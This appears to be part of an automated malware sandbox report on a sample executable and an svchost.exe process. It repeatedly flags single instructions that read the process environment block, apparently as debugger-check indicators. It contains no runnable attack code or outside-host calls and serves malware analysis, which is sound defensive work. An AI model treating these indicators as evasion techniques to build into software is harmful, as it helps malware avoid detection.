Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00D66C80 mov eax, dword ptr fs:[00000030h]	0_2_00D66C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]	2_2_035D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]	2_2_035D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]	2_2_0360634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]	2_2_0352C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]	2_2_03550310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]	2_2_035EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]	2_2_035B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]	2_2_035663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]	2_2_0352A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]	2_2_03536259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]	2_2_0352826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]	2_2_0360625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]	2_2_0352823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]	2_2_036062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]	2_2_0352C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]	2_2_035F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]	2_2_03560124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]	2_2_036061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]	2_2_035601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]	2_2_03570185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]	2_2_03532050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]	2_2_035B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]	2_2_0355C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]	2_2_035B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]	2_2_035C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]	2_2_0352A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]	2_2_0352C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]	2_2_035B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0352C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]	2_2_035720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0352A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]	2_2_035380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]	2_2_035B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]	2_2_0353208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]	2_2_035280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]	2_2_035C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]	2_2_03530750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]	2_2_035BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]	2_2_035B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]	2_2_03538770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]	2_2_03530710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]	2_2_03560710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]	2_2_0356C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
